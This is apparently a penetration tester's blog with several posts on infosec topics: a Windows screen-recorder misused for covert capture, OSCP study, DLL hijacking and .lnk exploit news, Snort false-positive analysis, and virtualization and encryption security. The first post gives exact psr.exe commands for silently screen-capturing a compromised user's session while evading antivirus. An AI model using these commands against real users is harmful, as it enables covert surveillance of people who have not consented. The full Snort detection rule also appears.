M$ Screencap Application For Troubleshooting… And Sleuthy Spying

I was recently made aware by an infosec colleague of mine DMFH (aka Donny Harris) about an M$ utility called the Problem Step Recorder, aka psr.exe.  It comes standard on Windows 7 machines.  In a nutshell it’s used to provide a step-by-step breakdown of user activity to provide to tech support after a user has re-created a problem, complete with screen captures!  NOTE: it does NOT capture keystrokes.  So, thankfully M$ did not embed a keylogger into Windows 7.  It shows a script of sorts of user’s activity in windows, info about PIDs, what mouse buttons are clicked and different hooks and internal system calls.  What got me was the screen captures… I know there are metasploit modules (screenspy and screenshot) and AutoIT apps, and that every keylogger on earth has a screencap ability.  DMFH made a good point tho: psr.exe would not be caught by most AV’s being that it is a signed and trusted system utility.  And, if a user sees psr.exe in their taskmgr and google it, they’ll see its an M$ troubleshooting tool, so they may be less concerned with it.

I realize that if you’re on a box and can run psr.exe you’ve already owned it, or are close to doing so; this is not the next l33t h@x0r attack, but another tool in your arsenal.  One use case could be you have shell access to machine (no meterpreter) and you can’t figure out a way to get tools onto the box for some reason.  If it’s a Windows 7 (didn’t find it on server 2k8 r2) you can grab screencaps and save them somewhere you can hopefully access.  Also, to reiterate my point, it’s an M$ utility so you don’t have to bring in another app that could trigger AV.

Below are a few pictures showing what the web archive (.mht) file contained.

Here are the commands to run psr.exe from the cli.  I did try it from a shell gained via metasploit and it worked like  a champ.  The key is migrate (if you’re not already running as them) into a PID of a user to capture that users’ session.

 psr.exe /start /output c:Usersusernametest.zip /sc 1 /gui 0

You need to issue (or schedule task) the below command to stop psr.exe from runningrecording.

psr.exe /stop

Here’s a blog post I found that details some of the switches of psr.exe.

Advertisement

Passed the Offensive Security OSCP Exam!

It has been an intense journey since I signed up for the PWBv3 course from Offsec.  But, now it is all worth it.  I received notice that I passed and can now claim the title: Offensive Security Certified Professional (OSCP).  I have taken many security courses, and have gotten a few certifications along the way, and I must say none have been as rewarding as this.  I cannot sing the praises of Offsec enough, even though sometimes during the course I wanted to curse their diabolical minds for coming up with some of the machines I had to penetrate.  I will admit that this was my second attempt at the OSCP exam.  I will not say I failed the first attempt (well actually that’s exactly what I did) but rather learned valuable lessons from it.  My first attempt was 23 hours straight (I took an hour nap) and at the end I knew I had come up short even before they emailed me.  But, this did not discourage me, it energized me!  I talked to many folks who had had a similar experience.  I will say that I hold this certification higher than any I have attained yet, bar none.

To those who are taking the course and may come across this post: Do not fret!  Remember what you’ve learned, and if you get knocked down get up and go at it again!  For those of you who are not (or have not) taken the course, check it out!  I guarantee even if you’ve been pen-testing for years this course will be a heckuva time!

Microsoft (and others’) DLL Load Hijacking Bug – Remote Exploit Possible

Microsoft’s  security advisory that came out Monday is a bit vague on this bug, but the issue is a bit more serious matter and deserves security pro’s attention, especially if your company uses in-house applications.  MS KB is here.  The issue itself is not new, but recently published research that details remote attack vectors is.  

More in depth analysis and a good read about this issue, and confirmation of public exploit code can be found here.

Metasploit has a detection module and audit kit for this bug that can be used to discover applications that are vulnerable to unsecured DLL loading (and also exploit them). 

This bug, at the moment, requires users to open a file which has a bogus DLL in the same directory.  There are many applications that are vulnerable (both MS and 3rd party), but Microsoft is leaving it to these vendors and their own internal teams to release application specific updates.  Also, for the application to be vulnerable it must accept files as input.  I’m working on getting the list of known vulnerable applications.

The remote vector uses SMB which is hopefully blocked at your perimter, WebDAV is usally not, though.

Office documents with embedded content are another vector, as well as USB drives.

The KB above and this MS RD blog entry have an MS developed tool that will mitigate most of this threat.  It’s an optional download and will not be released by MS update. 

The SRD blog states that if users disable outbound SMB and kill the WebDAV client service on workstations they’re good to go (although the attack vector of locally hosted share or USB thumb drives will still persist), so it may be worthwhile looking at the MS fix tool.

The Perfect Storm – A Story of Snort False Positive Verification

I recently had an opportunity to do some research into a large volume of Snort IDS rules that had begun to fire (to the tune of millions of alerts a day) for an organization.  At first glance these alerts appeared to be false positives, but they smelled like a lazy application DDoS attempt from some external source after a little review.  When the alerts didn’t stop, and considering the application in question wasn’t even being used I needed to provide clarity as to why these alerts were firing.  A simple “ignore them, they’re false positives” wasn’t going to fly here.   

The snort rule summary is as follows (full code displayed later): 

 Its an Oracle 10g application exploit alert, SID 15554 

Alert if 

Source: Outside 

Destination: Inside 

Traffic flow: to server 

Port: 6000-6199 

Protocol: HTTP 

Packet contents match following Perl regular expression (more explanation to follow): /^(GET|POST|HEAD)s+[^x25]*x25[x23x24x27x2ax2bx2dx2ehlqjzt1234567890]*[diouxefgacspn]/i 

Don’t let the regex above spook you.  Even tho it has hex characters in it, breaking it down isn’t too hard.  I’ll get into it’s meaning in more detail below:  

First, a little background on big companies and their web sites.  Oftentimes the volume of traffic to the sites is so large companies will use clustered web servers with load balancing appliances in front of them.  For security reasons the server cluster won’t be hosting the website on normal port 80 or 443, but the virtual IP (VIP) of the load balancer will accept 80 and 443 traffic.  Then, the traffic is NAT’d internally and distributed to one of the web servers on a non standard port.  What I discover is that the company had randomly decided to use a port in the 6000-6199 range for post nat’d web traffic.    That in conjunction with the IDS placement and meant the first five cases of the Snort rule were met.  However, five out of six cases is not enough for an alert. 

 The final case to match was the regular expression.  Here is an attempt to breakdown what this expression means in a more user friendly format: 

 Match the words “GET, POST or HEAD” if they appear at the start of a message.  Then match any number of spaces but not a line that  ends with a “%” sign.  Continue to match any series of characters (both numbers and letters) followed by a “%” sign.  Continue to match if the next set of characters matches one of these “#$’*+-. hlqjzt1234567890” and lastly match if the next characters contain one any of these “diouxefgacspn”.  This is all case sensitive. 

 After some HTTP packet analysis it was determined that the search functionality on the website matched this regular expression, and was causing the alert to fire erroneously.  Here is a sample of an HTTP GET request for a user initiated search: 

 GET http://www.bogusurl.com/enUS/search-results/default.html?search=test&Ep=search:results:results%20page HTTP/1.0 

Other legitimate requests may also have been matching the Snort rule. 

 Verification of the regular expression matching was performed on the following website: http://www.internetofficer.com/seo-tool/regex-tester/ 

   

The end result was something of a perfect storm, wherein the Snort rules’ cases where being matched by legitimate web traffic. This explanation satisfied the organization and the rule was flagged as false positive. 

 Here is the complete text of the Snort rule:

oracle.rules:alert tcp $EXTERNAL_NET any -> $HOME_NET [6000:6199] (msg:”ORACLE Oracle Application Server 10g OPMN serviceformat string vulnerability exploit attempt”; flow:to_server,established; content:”HTTP”; nocase; 
pcre:”/^(GET|POST|HEAD)s+[^x25]*x25[x23x24x27x2ax2bx2dx2ehlqjzt1234567890]*[diouxefgacspn]/i”; metadata:policy 
balanced-ips drop, policy security-ips drop; reference:bugtraq,34461; reference:cve,2009-0993; 
reference:url,www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html; classtype:attempted-admin; 
sid:15554; rev:1;)

Shellcode, Assembly and Buffer Overflow

This is quick commo check and update to my progress with the PWBv3 course.

I’ve spent the better part of this week knee deep in shellcode, assembly and debuggers… and let me tell you my brain needs a break!  Don’t let the latter sentence scare you away from this course; the tutorials and examples are excellent, even if you’ve never read the output of a debugger before you can handle it with the help of the videos and lab guide.  I just finished the “extra mile” portions of the buffer overflows module.  I was determined to nail those!  I’ve also read that the extra mile modules will help you in your quest for the OSCP certification (24 hours hack some boxes, remember?).  I found this site to be very helpful when trying my hand at an SEH overflow.

Diving into this training has afforded me the opportunity to strengthen muscles that I used daily, but to also train new ones, with regards to pen testing.

I’ll be writing up more about stack based buffer overflows and basic fuzzing in the future.

Metasploit Module Released for Latest Windows 0-day

 

The folks over at the Metasploit Framework have released a working exploit module that takes advantage of the much talked about vulnerability in the Windows Shell.  

This module proves this vulnerability is not limited to being exploited via thumb drives or email attachments. 

Microsoft has no patch available as of yet, however they offer some ugly workarounds: disable the display of .lnk and .pif files, block .lnk.pif files at your network’s perimeter, or disable WebDAV…

FYI: Disabling WebDAV wreaks havoc in some SharePoint instances.

The browser exploit module uses WebDAV to host a .lnk file and malicous dll.  No click necessary!  After the target browses to a malicous site, assuming WebDAV is enabled, up pops a window containing the two files and your msf payload is deployed.  McAfee 8.7.0i was mum to the exploit, even tho a source at McAfee has stated, “Coverage for known exploits is provided in the current DAT set (6047) as Generic Dropper!dfg”.  Perhaps thats why I got no alert: my payload wasn’t’ a trojan.  

Regardless, this is a very good delivery method and while the attacks using this method in the wild are targeted, I wouldn’t be surprised if more malcode was to be spread via this vector.

Offensive Security Penetration Testing With Backtrack (PWB3)

In my never ending quest for IT security excellence I’ve decided to enroll in the Offensive Security Penetration Testing With Backtrack version 3 (PWB3) course, offered by Offensive-Security.  The course, formerly known as OSCP 101, has turned out to be quite a different animal than other security coursescertification tracks I have taken in the past.  I opted to take the online version, which fits my learning style (and family life!).  I am one week into the course and already think it’s one of the finest security training events I’ve gotten to be a part of so far.  Before enrolling I did some searching to find reviews and opinions of different course participants, and while I did find several, they were few and far between.  I’ve decided to write about my experiences to date, and to provide updates periodically up until the point I take the final exam.  Speaking of the exam, did I mention it’s a 100% hands on exercise, wherein exam participants must compromise unknown machines to pass it?  I don’t think any type of exam cram method will help folks out on this one!  You either know how to perform a pen test, or you fail, simple as that.

I did some reading and found several great write up from folks who have taken the course, but I wanted to throw my hat in the ring of reviewers as well.  I would definitely read these other posts, to get different points of views on the PWB3 course.  You can find one here

Once enrolled you get vpn access to the offsec lab environment, flash video files for the couse and pdf lab guide, as well as a dedicated XP vm in the lab network.

One of the neatest things I’ve come to discover while taking this course is that the initial modules, which at first glance I was tempted to skip, provided value to me!  I’ve been using backtrack for several years, and while my Linux skills may not equate me to an Uber Linux Ninja I am fairly capable of using the Linux command line and bash scripting.  I forced myself early on not to skip any modules and to watch all of the videos AND read the corresponding sections in the lab guide.  I was pleasantly surprised when shortcuts to the ways I’d been doing things were shown, or different tricks to manipulating text were displayed.  I have thoroughly enjoyed the different lab exercises to this point, and have begun getting into the nitty gritty of buffer overflows and shellcode. 

One area that has particularly fascinated me has been the use of search engines (specifically Google) in penetration testinginformation gathering.  I’ve known about Johny Long’s Google Hacking Database  for several years now, but to see it used in practical examples was excellent.  Using Google to find actual vulnerable web servers was cool (also dangerous), but the simple data gathering techniques shown were very eye opening.  To see, and use, some of the different tricks like using Google search operators to scour the Inter-webs to find juicy bits of data has really been excellent.  I’ve known and used some of these techniques in the past, but some of the operators or search methods were new to me.  In one instance I discovered a PDF document that’s footer read “Data contained within this document is confidential and proprietary”.  Yikes!  I contacted the company that was hosting the data and it disappeared the next day. 

It really is amazing the types of things you can find out about people and organizations without doing any “hacking” per se, but just intuitively searching Google.  I highly suggest folks try searching for their own names or originations and see what comes up, you might be surprised!  

This course takes you through a penetration test, from alpha to zeta, and adds value throughout.  I can’t speak more highly of it… well, scratch that.  If I pass the final exam THEN I’ll not be able to speak higher…  I’ll update you on my progress in a week or so.

VMware Releases New vSphere Hardening Guides. DISA STIG Precurser?

VMware announced January 25th that they have publicly released security hardening guides for  the vSphere virtualization platform.  The hardening guides are broken down via the following categories: introduction, virtual machines (vm’s),  host, vNetwork, vCenter, and Console OS.    I’ve read through them and they are broken down well, with brief descriptions of the security topic or setting that is being discussed, along with recommendations with detailed instructions, or links to guides with more in depth instructions.

I cannot confirm this via the Defense information Systems Agency (DISA), however I feel that these guides will play heavily into the development of a new DISA  ESX Security Technical Implementation Guide (STIG).  This is welcome news for those who work in the DoDMilitary workspace. Organizations that have implemented or are implementing vSphereESXESXi 4.0 have been relying on the old STIG, which was written with VI3 and ESX 3.5 in mind, and best practices to secure their implementations.  The subject areas these guides are broken into also mirrors the current DISA STIG checklist format, which leads me to believe that STIG checklists for vSphere won’t be far behind.

Virtualization: Pros, Cons and Security: A Few Things to Consider

My virtualization experience is limited to using VMware’s suite of products, ESX 3.0 and 3i to be specific.  I also have up to 10 virtual machines (VMs) running at my home office using VMWare Workstation 6.5, everything from honey pot boxes, to domain controllers, and of course my “victim” machine(s).  I’ve been using VM’s for about five years now, some personally and some professionally.  Before being introduced to ESX and using VMware in an enterprisedatacenter environment  I was intrigued by the idea of having multiple operating systems (OS’) on a single machine without having to set the computer up as a dual boot machine, which is, let’s face it: a pain.

I became a “quasi” ESX administrator and was introduced into a whole new ball game.  A say quasi because it wasn’t my primary job function but everyone on the team became a surrogate ESX admin.  We setup a dual ESX environment (two Dell PowerEdge M-Series Blade Systems with 16 blades each) with the data (in the form of the virtual disk files: vmdk’s) residing on a storage area network (SAN).   We usually run 700-800 virtual servers, from Windows to Red Hat, with an additional 200 running on network attached storage (NAS) devices.  With the proper configuration of NIC teaming and ESX’s load balancingfailover settings I discovered an immensely fault tolerant environment that was nearly devoid of one of the biggest issues enterprise admins face:  hardware problems.  Another treat was the server provisioning process.  It took nearly a month from start to finish to get a hard standing server; ordering the server, provisioning rack space, getting the server, installing softwarehardware, testinghardening and finally delivery to the internal customer.  With the VM environment the requester simply placed an internal order for the server and we spun it up from a template .iso.   15 minutes, you’re server’s ready for custom applications and your use.   Finally, our disaster recovery was pretty straightforward: move all of the VM’s to a waiting offsite ESX server.  Flip the switch, and you’re done.   Not only did we save money on hardware cost but on energy.  When you don’t have to cool and power a bunch of hardware you don’t spend as much every month on the electric bill.

There were a lot of pros working with the virtual environment.  Centralized administration and fault tolerance, to name a few.  But, on the other hand there were some cons as well.  If anything goes wrong with your VM environment you lose your servers (800 servers in our case).   We had several places that things could go wrong: the ESX’s themselves and the SANNAS.  When the ESX was broken (human configuration error) we lost a ton of servers.

On the admin side of the house you’re focused so much on the technology and getting stuff to work properly that you sometimes forget about that pesky little piece of IT that seems to ruin all of your fun: Security.  It’s not uncommon for admins to “forget” security.  Heck, the Internet was designed with it as an afterthought (if you don’t believe me just look at DNS, or TCPIP).  I, unfortunately, no longer have the leisure of looking at technology with strictly “admin eyes”.  I now must consider the ramifications it has with regards to security; both of the system and the infrastructure.

The first big issue with security is hostguest segregation.  Put simply: stuff that happens on the VM doesn’t affect the server that is running VMware Workstation or ESX.  That was always a big selling point for VMWare, memory and process segregation.  However, leave it to the vulnerability researchers to rain on folks’ parades.  A bug in VMware, discovered by Kostya Kortchinsky, allows code to be executed from a guest OS to run on the host.  Check it out. Scary, to say the least.  So, now you need to worry about bugsflaws in your guests harming your host, and if that host is an ESX that houses 500 VM servers… you do the math.  On a similar note some of the newer VM packages include the ability to cut paste between VM’s and allow actual host disk access from a guest.  Not smart, in my opinion.  I’d flip those switches to “off”.

The next area of concern that should be paid close attention to is virtual networking.  The virtual network layer operates similarly to physical network, using vNics and vSwitches and… hmm… v-VLAN’s.  It is possible to bind specific virtual NICs and virtual switches to physical NICs on a host that lead to separate LAN’s (a DMZ and an internal network, for example).  If it’s configured properly you can have complete network segregation within a single ESX.  However, with a few simple mistakes you can create a bridge between the two networks.  Simply enable IP forwarding on a guest and make one or two configs on the vSwitches and you’ve just bridged the networks.  Which leads me to my next point:

Separation of duties.  What happens when you have ESX admins who also have Root on guests?  You have a problem.  They are the gatekeepers and now have a lot of power.  As a best practice the ESX hosts and guests should be admin’d by separate departmentsteams, and neither should have excessive rights to the other’s systems.

All in all I’d say that I am a fan of virtualized environments, IF they’re setup properly.  Some feel that virtual environments have too many places that could be points of failure for multiple servers, but that’s when careful thought, planning and analysis come into play.  If it’s done right, a virtualized data center is a fluid machine.  Literally!  It’s only one machine…

Data-At-Rest Encryption

To encrypt or not to encrypt?  That is the question.  The answer is universally YES!  However, there are two schools of thought when it comes to protecting data at rest (possibly more, but I only care about two).  First of all, let’s define what data at rest (DAR) is so you don’t have to open a new tabbrowser window and hit Google.  I’m sure if this post has come up on a search or has otherwise caught your eye you know what DAR is, but I’ll lay it out for you here nonetheless:   Any data that is not traveling over a network, or is sitting in volatile memory is DAR.  It’s sitting somewhere in storage, hoping to be useful someday.  This could be any data, from old emails to operating system files to cached logon credentials.  Whether or not you feel like you are a target for malicious computer users, you should want to protect your data.  More so if you’re an organization that deals with proprietary data or government information.

Now, back to the two schools of thought:  on the one hand you have File Encryption (FES), on the other Full Disk Encryption (FDE).  Both technologies have their pros and cons, and both have their vehement supporters and nay sayers.  I’d be interested to know what your thoughts are on the matter.  I myself have an opinion, and it is just that—an opinion.  I won’t say that it fits every scenario, but for security centric folks I’d say that FDE provides the most robust security for mobile devices and fixed workstations alike.  That view is not shocking; most experts will agree that FDE’s preboot authentication, which negates the extremely lax and easily bypassed security of BIOS and operating system (OS) passwords, is a highly secure method of protection.  Let’s not forget that FDE prevents the hard disk or the OS from being accessed via a live Linux distribution, such as BackTrack. Once a malicious user has physical access to a device, compromising it can take seconds with a live boot Linux OS like BackTrack; however, if the device is protected by FDE then the OS and the data is unreachable.

Some pundits argue that FDE is cumbersome to the end user and has a low level of acceptance when it is deployed.  Speaking of deployment, others say it is very difficult to deploy FDE software in an enterprise environment.  I can speak to both of those issues:  First, depending on the skill level of the IT staff, it is not difficult to integrate FDE software en masse using directory services or other management platforms.  As far as end user acceptance, the grim picture that has been painted by some is that of a painstaking logon process followed by a horrendously long boot cycle.  This in fact is false.  Most FDE software integrates with the native OS’s logon daemons or services such that it is nearly identical to the logon process the user is familiar with.

File Encryption has its place. FES is most suitable for non-mobile devices, protecting critical data or OS files. Even then, it takes a lot more configuration and monitoring to ensure that you cover all of your bases. And, sometimes companies leave it in the end user’s hands to decide what’s encrypted and what’s not. When it comes to security my rule is to NEVER leave it to the end user. Also, if you give someone an inch, they’ll take a mile. FES leaves the door open for attackers to be able to access the OS and unencrypted portion of the file system. Maybe they’ll drop a few links in a non-critical area, or perhaps they’ll slip a few custom dll’s into a non-encrypted area of the file system, just waiting to be called by a cron job. If you’re going to invest in DAR, why would you give malicious users a foothold?

FDE has come a long way and has had its ups and downs, but for the most part I feel it is the most secure solution for a mobile workforce (heck, if it works on laptops why not workstations?). All of the stars need to align properly for a successful FDE implementation: first, you need upper echelon support; second, you need a skilled technical staff to implement it, and third, you need to communicate its benefits to managers and users alike.